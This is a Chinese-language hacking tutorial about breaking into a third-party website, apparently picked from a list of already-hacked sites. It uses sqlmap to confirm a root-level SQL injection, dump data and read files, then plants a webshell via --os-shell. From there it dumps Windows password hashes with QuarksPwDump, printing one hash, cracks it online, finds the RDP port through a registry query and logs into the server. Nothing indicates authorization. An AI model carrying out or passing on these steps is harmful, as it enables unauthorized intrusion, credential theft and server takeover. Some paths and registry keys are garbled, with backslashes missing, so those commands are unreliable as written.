今天在来一个mysql提权 (也可以说是默认system权限提的)
在被黑站点找到一个站
先教拿shell
是有注入漏洞的 有可能是root权限的注入点
可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shell
D:wampwwwjscontent.php 有时候物理路径是很有用的
上sqlmap注入 使用命令 这个是mysql数据库的
sqlmap.py -u 注入点 --current-user # /*获取当前用户名称
sqlmap.py -u 注入点 --current-db # /*获取当前数据库名称
sqlmap.py -u 注入点 -D "数据库名" -T "表名" --tables
sqlmap.py -u 注入点 -D "数据库名" -T "表名" --columns
sqlmap.py -u 注入点 -D "数据库名" -T "表名" -C "字段" --dump
sqlmap.py -u 注入点 --file-read "文件名"#读取文件load_file()
sqlmap.py -u 注入点 --is-dba #是否是数据库管理员
sqlmap.py -u 注入点 --passwords #数据库用户密码
这个是win环境的安装的sqlmap 不是linux环境安装的 使用方法 多了(.py)
好了 看一下是什么权限注入点
sqlmap.py -u 注入点 --current-user # /*获取当前用户名称
如图 我们看到了是什么环境 win + 阿帕奇 注入点是root权限
current user: 'root@localhost'
好了 知道是什么权限了 现在就来写shell 写shell前提条件 (1.必须是root权限 2.必须知道网站路径 3.GPC设置为off 就可以写shell了)
以上3个我们都达到了 至于第三个 因为php默认GPC设置都是为off
D:wampwwwjscontent.php 物理路径 继续
命令
sqlmap.py -u 注入点 --os-shell
如图
这里 它让你选择木马脚本 这里我们都是用第3个
确认提下两下 刚刚得到的路径D:wampwwwjs
之后回车
得到了一个shell js mpuyqwq.php
shell 拿到了 现在就是提权了 我有个习惯就是php提权的时候 每次都会使用一下自带的执行命令 
我运气太好了 呵呵 当然也可以用mysql提也就是udf (版本5.0的默认导出dll就可以)
好了现在就是添加用户 或者抓哈希值 (我就不提交用户了 抓个哈希值)
使用国外神器 QuarksPwDump.exe 使用命令
路径quarkspwdump.exe --dump-hash-local --output 路径1.txt
好了得到 1.txt 也就是哈希值文本
得到这个 然后复制 14EFBCC05C9817DBAAD3B435B51404EE:D8BB76D4A8CE4E34810C1BB045697B45
去http://www.objectif-securite.ch/ophcrack.php这个 网站破解.
得到明文 现在就是找一下远程端口 在此教一个快速找远程端口的方法
使用dns命令
查看终端命令:REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber
得到这个 0xd3d 有基础的一点知道 就是默认10进制的3389 也就是默认远程端口
不知道也没关系
如图:
ok 3389 登录服务器看看
到此 教程完毕 转载的朋友请联系作者id
如果是sa权限的话 直接执行-os-shell
直接执行cmd 命令就行